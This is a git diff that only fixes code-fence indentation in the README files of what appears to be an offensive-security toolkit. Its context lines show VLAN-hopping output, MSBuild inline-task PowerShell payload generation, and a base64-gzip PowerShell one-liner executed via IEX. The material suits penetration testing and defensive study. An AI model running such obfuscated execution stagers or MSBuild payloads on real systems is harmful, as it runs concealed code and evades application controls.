diff --git a/networks/README.md b/networks/README.md index ff85925..ca2343b 100644 --- a/networks/README.md +++ b/networks/README.md @@ -11,7 +11,7 @@ Sample output: - ``` +``` $ ./VLANHopperDTP.py --help :: VLAN Hopping via DTP Trunk negotiation @@ -68,7 +68,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1 [+] Hopped to VLAN 20.: 172.16.20.10 [+] Hopped to VLAN 30.: 172.16.30.11 [+] Hopped to VLAN 99.: 172.16.99.10 - ``` +``` - **`nmap-grep-to-table.sh`** - Script converting nmap's greppable output (-oG) into a printable per-host tables. ([gist](https://gist.github.com/mgeeky/cd3092cf60fd513d786286a21c6fa915)) diff --git a/social-engineering/README.md b/social-engineering/README.md index b42d492..23638b7 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md @@ -8,7 +8,7 @@ Example output **not minimized**: - ``` +``` C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 :: Powershell via MSBuild inline-task XML payload generation script @@ -61,11 +61,11 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S ------------------------------------------------------------------------------------ - ``` +``` **minimized** - ``` +``` C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m :: Powershell via MSBuild inline-task XML payload generation script @@ -89,7 +89,7 @@ kVG9FbmQoKTs=");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=R ();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]> ------------------------------------------------------------------------------------ - ``` +``` - **`msbuild-powershell-msgbox.xml`** - Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script. @@ -101,10 +101,10 @@ ngTask> Example: - ``` +``` $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); - ``` +``` - **`muti-stage-1.md`** - Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. ([gist](https://gist.github.com/mgeeky/6097ea56e0f541aa7d98161e2aa76dfb)) diff --git a/web/README.md b/web/README.md index cee719a..3beb676 100644 --- a/web/README.md +++ b/web/README.md @@ -7,7 +7,7 @@ Sample output could look like: - ``` +``` Usage: detect.py Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4a5463794a545a6a4a5459304a5449784a5449774a544e684a544a6b4a544935" [+] Detected encoding: HexEncoded @@ -26,11 +26,11 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4 [>] Encoding HexEncoded: (Rk9PJTIwSGVsbG8lMjB3b3JsZCUyMSUyMCUzQS0lMjklMjBCQVI=) => (526b39504a544977534756736247386c4d6a423362334a735a4355794d5355794d43557a5153306c4d6a6b6c4d6a42435156493d) (3) ENCODED FORM: "526b39504a544977534756736247386c4d6a423362334a735a4355794d5355794d43557a5153306c4d6a6b6c4d6a42435156493d" - ``` +``` When `DEBUG` is turned on, the output may also look like: - ``` +``` $ ./reencode.py JTQxJTQxJTQxJTQx [.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" @@ -81,7 +81,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA') (2) TO BE ENCODED TEXT: "FOO AAAA BAR" (3) ENCODED FORM: "Rk9PJTIwQUFBQSUyMEJBUg==" - ``` +``` - **`oRTC-leak-internal-ip.js`** - Internal IP address leakage via Object RTC (ORTC) interface implemented in Microsoft Edge. ([gist](https://gist.github.com/mgeeky/03f0871fb88c64b3d6d3a725c3ba38bf)) @@ -101,7 +101,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA') - **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee)) - ``` +``` # Simple utility that aids the penetration tester when manually testing Padding Oracle condition # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # @@ -120,7 +120,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA') # This script could be then launched to generate every possible test case of second to the last block # being filled with specially tailored values (like vector of zeros with last byte ranging from 0-255) # and then used in some kind of local http proxy (burp/zap) or http client like (curl/wget). - ``` +``` - **`create_mitm_certificate.sh`** - Simple SSL/TLS self-signed CA Certificate generator for MITM purposes. ([gist](https://gist.github.com/mgeeky/5e36d6482e73ab85c161c35bfd50c465))